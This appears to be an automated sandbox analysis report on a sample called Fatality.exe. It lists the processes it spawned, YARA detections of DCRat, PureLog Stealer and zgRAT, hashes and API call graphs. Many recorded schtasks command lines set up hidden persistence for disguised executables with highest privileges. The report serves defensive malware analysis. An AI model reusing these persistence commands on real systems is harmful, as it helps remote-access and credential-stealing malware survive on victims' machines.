                                    Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 35 20 41 75 67 20 32 30 32 34 20 31 33 3a 34 35 3a 30 37 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 34 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 6b 65 65 70 2d 61 6c 69 76 65 0d 0a 0d 0a 3b 55 5f 5b
                                    Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Sun, 25 Aug 2024 13:45:07 GMTContent-Type: text/html; charset=UTF-8Content-Length: 4Connection: keep-alive;U_[
                                    Aug 25, 2024 15:45:08.791230917 CEST  183  IN  HTTP/1.1 100 Continue
                                    Data Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 35 20 41 75 67 20 32 30 32 34 20 31 33 3a 34 35 3a 30 37 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 34 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 6b 65 65 70 2d 61 6c 69 76 65 0d 0a 0d 0a 3b 55 5f 5b
                                    Data Ascii: HTTP/1.1 200 OKServer: nginxDate: Sun, 25 Aug 2024 13:45:07 GMTContent-Type: text/html; charset=UTF-8Content-Length: 4Connection: keep-alive;U_[



                                    Target ID:0
                                    Start time:09:43:00
                                    Start date:25/08/2024
                                    Path:C:\Users\user\Desktop\Fatality.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\Fatality.exe"
                                    Imagebase:0x890000
                                    File size:3'517'117 bytes
                                    MD5 hash:A5A9CDE94B59BC5B8B88D60FC28177D3
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:Borland Delphi
                                    Reputation:low
                                    Has exited:true

                                    Target ID:1
                                    Start time:09:43:00
                                    Start date:25/08/2024
                                    Path:C:\Windows\System32\dllhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                    Imagebase:0x7ff642ec0000
                                    File size:21'312 bytes
                                    MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate
                                    Has exited:true

                                    Target ID:2
                                    Start time:09:43:02
                                    Start date:25/08/2024
                                    Path:C:\Windows\SysWOW64\wscript.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\System32\WScript.exe" "C:\Bridgemonitor\Xaqgc4UniUxink9TEvtSaN4iIb.vbe"
                                    Imagebase:0x930000
                                    File size:147'456 bytes
                                    MD5 hash:FF00E0480075B095948000BDC66E81F0
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate
                                    Has exited:true

                                    Target ID:4
                                    Start time:09:43:18
                                    Start date:25/08/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\system32\cmd.exe /c ""C:\Bridgemonitor\zS0fKDlKT05bxtO58C1eiBYQ1f.bat" "
                                    Imagebase:0x1c0000
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:5
                                    Start time:09:43:18
                                    Start date:25/08/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff66e660000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:6
                                    Start time:09:43:18
                                    Start date:25/08/2024
                                    Path:C:\Bridgemonitor\BridgeInto.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Bridgemonitor/BridgeInto.exe"
                                    Imagebase:0x840000
                                    File size:1'960'448 bytes
                                    MD5 hash:910284D590BDF27BBEEDBDE3F3A2A94D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000006.00000000.2282375073.0000000000842000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000006.00000002.2341978814.0000000012F28000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Bridgemonitor\BridgeInto.exe, Author: Joe Security
                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Bridgemonitor\BridgeInto.exe, Author: Joe Security
                                    Antivirus matches:
                                    • Detection: 100%, Avira
                                    • Detection: 100%, Joe Sandbox ML
                                    • Detection: 100%, ReversingLabs
                                    Reputation:low
                                    Has exited:true

                                    Target ID:7
                                    Start time:09:43:19
                                    Start date:25/08/2024
                                    Path:C:\Windows\System32\dllhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
                                    Imagebase:0x7ff642ec0000
                                    File size:21'312 bytes
                                    MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate
                                    Has exited:true

                                    Target ID:8
                                    Start time:09:43:19
                                    Start date:25/08/2024
                                    Path:C:\Windows\System32\dllhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                    Imagebase:0x7ff642ec0000
                                    File size:21'312 bytes
                                    MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate
                                    Has exited:false

                                    Target ID:9
                                    Start time:09:43:20
                                    Start date:25/08/2024
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:schtasks.exe /create /tn "EoNanmDGxPEtougVgAjHLxE" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\microsoft.net\RedistList\EoNanmDGxPEtougVgAjHLx.exe'" /f
                                    Imagebase:0x7ff7f42f0000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:10
                                    Start time:09:43:21
                                    Start date:25/08/2024
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:schtasks.exe /create /tn "EoNanmDGxPEtougVgAjHLx" /sc ONLOGON /tr "'C:\Program Files (x86)\microsoft.net\RedistList\EoNanmDGxPEtougVgAjHLx.exe'" /rl HIGHEST /f
                                    Imagebase:0x7ff7f42f0000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:11
                                    Start time:09:43:21
                                    Start date:25/08/2024
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:schtasks.exe /create /tn "EoNanmDGxPEtougVgAjHLxE" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\microsoft.net\RedistList\EoNanmDGxPEtougVgAjHLx.exe'" /rl HIGHEST /f
                                    Imagebase:0x7ff7f42f0000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:12
                                    Start time:09:43:21
                                    Start date:25/08/2024
                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5qzorvzb\5qzorvzb.cmdline"
                                    Imagebase:0x7ff6af610000
                                    File size:2'759'232 bytes
                                    MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:moderate
                                    Has exited:true

                                    Target ID:13
                                    Start time:09:43:21
                                    Start date:25/08/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff66e660000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:14
                                    Start time:09:43:21
                                    Start date:25/08/2024
                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESDC85.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC48DFCF3E932B4A62A92F13B5F615A1E.TMP"
                                    Imagebase:0x7ff6470d0000
                                    File size:52'744 bytes
                                    MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:15
                                    Start time:09:43:21
                                    Start date:25/08/2024
                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2csyxc1q\2csyxc1q.cmdline"
                                    Imagebase:0x7ff6af610000
                                    File size:2'759'232 bytes
                                    MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:16
                                    Start time:09:43:21
                                    Start date:25/08/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff66e660000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:17
                                    Start time:09:43:21
                                    Start date:25/08/2024
                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESDE79.tmp" "c:\Windows\System32\CSCC3741A71028464F81756764D7843821.TMP"
                                    Imagebase:0x7ff6470d0000
                                    File size:52'744 bytes
                                    MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:18
                                    Start time:09:43:22
                                    Start date:25/08/2024
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:schtasks.exe /create /tn "EoNanmDGxPEtougVgAjHLxE" /sc MINUTE /mo 11 /tr "'C:\Program Files\Microsoft Office 15\ClientX64\EoNanmDGxPEtougVgAjHLx.exe'" /f
                                    Imagebase:0x7ff7f42f0000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:19
                                    Start time:09:43:22
                                    Start date:25/08/2024
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:schtasks.exe /create /tn "EoNanmDGxPEtougVgAjHLx" /sc ONLOGON /tr "'C:\Program Files\Microsoft Office 15\ClientX64\EoNanmDGxPEtougVgAjHLx.exe'" /rl HIGHEST /f
                                    Imagebase:0x7ff7f42f0000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:20
                                    Start time:09:43:22
                                    Start date:25/08/2024
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:schtasks.exe /create /tn "EoNanmDGxPEtougVgAjHLxE" /sc MINUTE /mo 9 /tr "'C:\Program Files\Microsoft Office 15\ClientX64\EoNanmDGxPEtougVgAjHLx.exe'" /rl HIGHEST /f
                                    Imagebase:0x7ff7f42f0000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:21
                                    Start time:09:43:22
                                    Start date:25/08/2024
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:schtasks.exe /create /tn "EoNanmDGxPEtougVgAjHLxE" /sc MINUTE /mo 6 /tr "'C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe'" /f
                                    Imagebase:0x7ff7f42f0000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:22
                                    Start time:09:43:22
                                    Start date:25/08/2024
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:schtasks.exe /create /tn "EoNanmDGxPEtougVgAjHLx" /sc ONLOGON /tr "'C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe'" /rl HIGHEST /f
                                    Imagebase:0x7ff7f42f0000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:23
                                    Start time:09:43:22
                                    Start date:25/08/2024
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:schtasks.exe /create /tn "EoNanmDGxPEtougVgAjHLxE" /sc MINUTE /mo 11 /tr "'C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe'" /rl HIGHEST /f
                                    Imagebase:0x7ff7f42f0000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:24
                                    Start time:09:43:22
                                    Start date:25/08/2024
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 5 /tr "'C:\Recovery\dllhost.exe'" /f
                                    Imagebase:0x7ff7f42f0000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:25
                                    Start time:09:43:22
                                    Start date:25/08/2024
                                    Path:C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    Imagebase:0xd60000
                                    File size:1'960'448 bytes
                                    MD5 hash:910284D590BDF27BBEEDBDE3F3A2A94D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000019.00000002.3380099691.0000000003532000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000019.00000002.3380099691.00000000037B9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    Antivirus matches:
                                    • Detection: 100%, ReversingLabs
                                    Has exited:false

                                    Target ID:26
                                    Start time:09:43:22
                                    Start date:25/08/2024
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Recovery\dllhost.exe'" /rl HIGHEST /f
                                    Imagebase:0x7ff7f42f0000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:27
                                    Start time:09:43:22
                                    Start date:25/08/2024
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 11 /tr "'C:\Recovery\dllhost.exe'" /rl HIGHEST /f
                                    Imagebase:0x7ff7f42f0000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:28
                                    Start time:09:43:22
                                    Start date:25/08/2024
                                    Path:C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Recovery\EoNanmDGxPEtougVgAjHLx.exe
                                    Imagebase:0x2f0000
                                    File size:1'960'448 bytes
                                    MD5 hash:910284D590BDF27BBEEDBDE3F3A2A94D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:29
                                    Start time:09:43:22
                                    Start date:25/08/2024
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:schtasks.exe /create /tn "WinStore.AppW" /sc MINUTE /mo 9 /tr "'C:\Users\All Users\ssh\WinStore.App.exe'" /f
                                    Imagebase:0x7ff7f42f0000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:30
                                    Start time:09:43:22
                                    Start date:25/08/2024
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:schtasks.exe /create /tn "WinStore.App" /sc ONLOGON /tr "'C:\Users\All Users\ssh\WinStore.App.exe'" /rl HIGHEST /f
                                    Imagebase:0x7ff7f42f0000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:31
                                    Start time:09:43:22
                                    Start date:25/08/2024
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:schtasks.exe /create /tn "WinStore.AppW" /sc MINUTE /mo 14 /tr "'C:\Users\All Users\ssh\WinStore.App.exe'" /rl HIGHEST /f
                                    Imagebase:0x7ff7f42f0000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:32
                                    Start time:09:43:23
                                    Start date:25/08/2024
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:schtasks.exe /create /tn "BridgeIntoB" /sc MINUTE /mo 10 /tr "'C:\Bridgemonitor\BridgeInto.exe'" /f
                                    Imagebase:0x7ff7f42f0000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:33
                                    Start time:09:43:23
                                    Start date:25/08/2024
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:schtasks.exe /create /tn "BridgeInto" /sc ONLOGON /tr "'C:\Bridgemonitor\BridgeInto.exe'" /rl HIGHEST /f
                                    Imagebase:0x7ff7f42f0000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:34
                                    Start time:09:43:23
                                    Start date:25/08/2024
                                    Path:C:\Windows\System32\schtasks.exe
                                    Wow64 process (32bit):false
                                    Commandline:schtasks.exe /create /tn "BridgeIntoB" /sc MINUTE /mo 9 /tr "'C:\Bridgemonitor\BridgeInto.exe'" /rl HIGHEST /f
                                    Imagebase:0x7ff7f42f0000
                                    File size:235'008 bytes
                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:35
                                    Start time:09:43:23
                                    Start date:25/08/2024
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\2EcQa8wgx4.bat"
                                    Imagebase:0x7ff7b8d10000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:36
                                    Start time:09:43:23
                                    Start date:25/08/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff66e660000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:37
                                    Start time:09:43:23
                                    Start date:25/08/2024
                                    Path:C:\Windows\System32\chcp.com
                                    Wow64 process (32bit):false
                                    Commandline:chcp 65001
                                    Imagebase:0x7ff6edda0000
                                    File size:14'848 bytes
                                    MD5 hash:33395C4732A49065EA72590B14B64F32
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:38
                                    Start time:09:43:23
                                    Start date:25/08/2024
                                    Path:C:\Windows\System32\PING.EXE
                                    Wow64 process (32bit):false
                                    Commandline:ping -n 10 localhost
                                    Imagebase:0x7ff736290000
                                    File size:22'528 bytes
                                    MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:39
                                    Start time:09:43:24
                                    Start date:25/08/2024
                                    Path:C:\Bridgemonitor\BridgeInto.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Bridgemonitor\BridgeInto.exe
                                    Imagebase:0xad0000
                                    File size:1'960'448 bytes
                                    MD5 hash:910284D590BDF27BBEEDBDE3F3A2A94D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:40
                                    Start time:09:43:24
                                    Start date:25/08/2024
                                    Path:C:\Bridgemonitor\BridgeInto.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Bridgemonitor\BridgeInto.exe
                                    Imagebase:0xe60000
                                    File size:1'960'448 bytes
                                    MD5 hash:910284D590BDF27BBEEDBDE3F3A2A94D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:41
                                    Start time:09:43:25
                                    Start date:25/08/2024
                                    Path:C:\Recovery\dllhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Recovery\dllhost.exe
                                    Imagebase:0xc70000
                                    File size:1'960'448 bytes
                                    MD5 hash:910284D590BDF27BBEEDBDE3F3A2A94D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\dllhost.exe, Author: Joe Security
                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\dllhost.exe, Author: Joe Security
                                    Antivirus matches:
                                    • Detection: 100%, Avira
                                    • Detection: 100%, Joe Sandbox ML
                                    • Detection: 100%, ReversingLabs
                                    Has exited:true

                                    Target ID:42
                                    Start time:09:43:25
                                    Start date:25/08/2024
                                    Path:C:\Recovery\dllhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Recovery\dllhost.exe
                                    Imagebase:0x950000
                                    File size:1'960'448 bytes
                                    MD5 hash:910284D590BDF27BBEEDBDE3F3A2A94D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true


                                      Execution Graph

                                      Execution Coverage:2.1%
                                      Dynamic/Decrypted Code Coverage:0%
                                      Signature Coverage:20%
                                      Total number of Nodes:5
                                      Total number of Limit Nodes:0

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 0 4d5685f-4d568a6 NtQueryInformationProcess GetSystemInfo
                                      APIs
                                      • NtQueryInformationProcess.NTDLL(?,00000000,?,00000018,00000000), ref: 04D56875
                                      • GetSystemInfo.KERNELBASE(?), ref: 04D56887
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2134426104.0000000004D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4d50000_Fatality.jbxd
                                      Similarity
                                      • API ID: InfoInformationProcessQuerySystem
                                      • String ID:
                                      • API String ID: 1993426926-0
                                      • Opcode ID: 334262aaaa4332ec87f7b9c58f6a6bc8a8b7a8d6b543afa9797abe839731536b
                                      • Instruction ID: 0d9dc9a25d292edc6cbdadc0005df3eb32f239d2f47e12abb35e4bb9f76c6ac3
                                      • Opcode Fuzzy Hash: 334262aaaa4332ec87f7b9c58f6a6bc8a8b7a8d6b543afa9797abe839731536b
                                      • Instruction Fuzzy Hash: 19F0FE76600219AFCB159F5AD849EDE7BA9EB49790B014015BD15E7250DB309901CBA0

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 60 4d566fc-4d5670f RtlExitUserProcess 61 4d5671c-4d567f5 60->61
                                      APIs
                                      • RtlExitUserProcess.NTDLL(?,77E8F3B0,000000FF), ref: 04D56709
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2134426104.0000000004D50000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4d50000_Fatality.jbxd
                                      Similarity
                                      • API ID: ExitProcessUser
                                      • String ID:
                                      • API String ID: 3902816426-0
                                      • Opcode ID: 457113bb015e71bdd2164b67245766c57edae6f87edb57fe93816350df76cb5d
                                      • Instruction ID: 33fb2a0b6d35ebf30d5b52456fb034446e07106989c7b01f4bc063ba5a66e552
                                      • Opcode Fuzzy Hash: 457113bb015e71bdd2164b67245766c57edae6f87edb57fe93816350df76cb5d
                                      • Instruction Fuzzy Hash: 60312AB2D1060CAFDB01CFD1C849BEEBBB9FB14336F21461AE521A6180D7785A088F60

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 66 aef598-aef5a3 67 aef5ac-aef5af 66->67 68 aef5a5-aef5aa 66->68 69 aef5b6-aef5ca VirtualAlloc 67->69 70 aef5b1 67->70 68->69 70->69
                                      APIs
                                      • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 00AEF5C3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2133322697.0000000000AE3000.00000040.00000001.01000000.00000003.sdmp, Offset: 00982000, based on PE: true
